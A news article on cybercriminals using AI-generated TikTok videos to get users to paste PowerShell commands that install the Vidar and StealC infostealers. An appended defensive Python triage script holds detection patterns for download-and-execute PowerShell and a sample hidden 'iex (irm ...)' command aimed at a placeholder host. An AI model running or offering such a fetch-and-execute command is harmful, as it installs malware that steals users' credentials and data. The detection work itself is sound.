Friday, January 16, 2026

Cybercriminals Use AI-Generated TikTok Videos to Spread Malware and Steal User Data


Hackers are increasingly using AI-generated videos on TikTok to trick users into downloading malware designed to steal sensitive information, cybersecurity experts at Check Point Software Technologies warn.

A Simple Yet Effective Attack Strategy

The method is deceptively straightforward: cybercriminals use artificial intelligence to mass-produce short tutorial-style videos that claim to show how to easily “activate” Windows or Microsoft Office, or unlock premium features in apps like Spotify or CapCut. These videos are then posted on TikTok, leveraging the platform’s algorithm to quickly go viral and reach large audiences. According to early analyses, one such video gained over 500,000 views.

“These are social engineering attacks that manipulate users into compromising their own systems. The instructions may look harmless or even convincing, but in reality, they execute malicious scripts, steal login credentials, or grant remote access to attackers,” says Wojciech Głażewski, Country Director at Check Point Software in Poland.

TikTok’s Popularity Amplifies the Risk

The threat is particularly serious given TikTok’s massive user base in Poland. As of 2024, the app had 13.5 million users in the country, amounting to 45.7% of all Polish internet users. It is especially popular among younger audiences, who spend an average of 1 hour and 22 minutes per day on the platform—more than on any other social media network.

This latest scheme is a modern version of a classic scam. The videos show a person opening the Windows “Run” dialog box and entering a PowerShell command, allegedly to unlock hidden features. In reality, the command downloads a malicious script that installs Vidar and StealC spyware. While the videos differ slightly in camera angles and URLs used in the scripts, their structure is nearly identical—suggesting automated content generation. The narration also appears to be AI-generated.

“These programs can take screenshots, steal login credentials, credit card information, cookies, crypto wallet data, 2FA codes, and much more,” Głażewski emphasizes.

A Shift in Tactics

Although video content has been used in malware campaigns before, this approach represents a significant shift. Previously, malicious links were typically placed in the video description or comments—locations that security systems could scan. Now, the malicious payload is embedded directly in the video content, helping hackers evade traditional detection mechanisms.

How to Protect Yourself

Cybersecurity experts recommend several precautions:

  • Avoid unverified commands, especially PowerShell scripts from unknown sources.
  • Use reliable security software to monitor and block suspicious activity.
  • And perhaps most importantly, use AI to fight AI—for example, ask ChatGPT or another AI assistant what a command does before running it to ensure it doesn’t download, execute, or damage anything on your computer.
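
One way to act on the monitoring advice above, as an added example that is not from Check Point or the original article: a Python triage function for process-creation events that flags the pattern described earlier, PowerShell started from the Run dialog to download and run a script. The sample events, the agent path and the example.invalid URLs are constructed; the field names follow Sysmon's process-creation event.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Cmdlets, aliases and .NET methods that pull content from the network.
DOWNLOAD = re.compile(
    r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|start-bitstransfer)\b"
    r"|download(string|file|data)", re.I)
# Running the fetched text directly, without writing a file first.
EXECUTE = re.compile(r"\b(invoke-expression|iex)\b", re.I)
# Hidden window (-w hidden, -WindowStyle Hidden) or encoded command (-e, -enc, -ec).
STEALTH = re.compile(r"\s-w\w*\s+hid|\s-e(nc\w*|c)?\s", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}

def triage(event):
    """Classify one process-creation event as 'alert', 'review' or 'ignore'."""
    if basename(event["Image"]).lower() not in SHELLS:
        return "ignore", []
    cmd = event["CommandLine"]
    reasons = []
    downloads = bool(DOWNLOAD.search(cmd))
    stealth = bool(STEALTH.search(cmd))
    if downloads:
        reasons.append("fetches remote content")
    if EXECUTE.search(cmd):
        reasons.append("executes fetched text in memory")
    if stealth:
        reasons.append("hidden window or encoded command")
    # explorer.exe is the parent for anything typed into the Run dialog, but also
    # for shortcuts and the Start menu, so it only counts alongside other signals.
    from_explorer = basename(event["ParentImage"]).lower() == "explorer.exe"
    if from_explorer:
        reasons.append("started by explorer.exe")
    if downloads and from_explorer and len(reasons) >= 3:
        return "alert", reasons
    return ("review" if downloads or stealth else "ignore"), reasons

# Constructed sample events; example.invalid is a placeholder host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/a.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": f'"{PS}"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": 'powershell -c "Invoke-WebRequest https://example.invalid/t.zip -OutFile t.zip"'},
    {"ParentImage": r"C:\Program Files\Agent\agent.exe", "Image": PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev), "<-", ev["CommandLine"])
```

On a machine where someone followed one of these videos, the typed command is also kept in the per-user `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` registry key, which is worth collecting during triage.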

Source: ceo.com.pl
